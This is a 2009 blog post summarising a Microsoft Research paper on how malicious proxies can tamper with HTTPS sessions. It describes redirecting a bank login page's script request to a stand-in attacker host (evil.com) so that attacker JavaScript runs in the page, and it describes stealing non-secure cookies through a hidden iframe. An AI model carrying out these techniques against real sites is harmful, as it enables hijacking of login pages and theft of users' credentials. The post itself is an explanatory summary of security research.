Saturday, May 30, 2009

Modifying content in HTTPS

I know I haven't updated in a while, but I'm here again to share my information with whoever wants it. This time, it's not something personal that I've discovered or an experience of my own.
Instead, I've recently read a paper published by Microsoft that really got me thinking about other possibilities that I'm going to be testing out and having fun with in the near future. The paper, written with malicious proxies in mind, points out browser flaws in handling certain events with HTTPS and intriguing research on modifying HTTPS content.

Personally, there was this one very inspiring technique that is rather easy to perform and something I'd consider dangerous. This was when a site such as https://bank.com/login.php calls for off-site file(s) or file(s) from their sub-domain, an example being a javascript file from https://scripts.bank.com/script.js. Now what happens is the person sends a request for https://bank.com, which also sends a request for https://scripts.bank.com/script.js, and the attacker sends back a 302 redirect to a different https script instead of https://scripts.bank.com/script.js. An easier to follow example:

A.) Victim sends request for https://bank.com/login.php
B.) https://bank.com/login.php calls script from https://scripts.bank.com/script.js
C.) Attacker does not return requested content, instead it returns a 302 redirect for https://script.bank.com/script.js which points to https://evil.com/script.js
D.) Now the attacker's script is loaded in the context of https://bank.com/login.php which means the attacker has access over the client-side content of the site and can use DOM manipulation to modify that client-side content.

The paper has other great new ideas that makes it completely worth the read. It also has other old ideas such as stealing cookies, of an https site, that do not have the secure bit set by modifying a page to put a hidden iframe that points to that same site, but over a regular http session. It is truly an inspiring paper that is on the path of deeper problems within how our browsers handle HTTPS sessions.

Paper located at: http://research.microsoft.com/pubs/79323/pbp-final-with-update.pdf

Presentation slides at: http://research.microsoft.com/pubs/79323/PBP-oakland-public.ppt

No comments: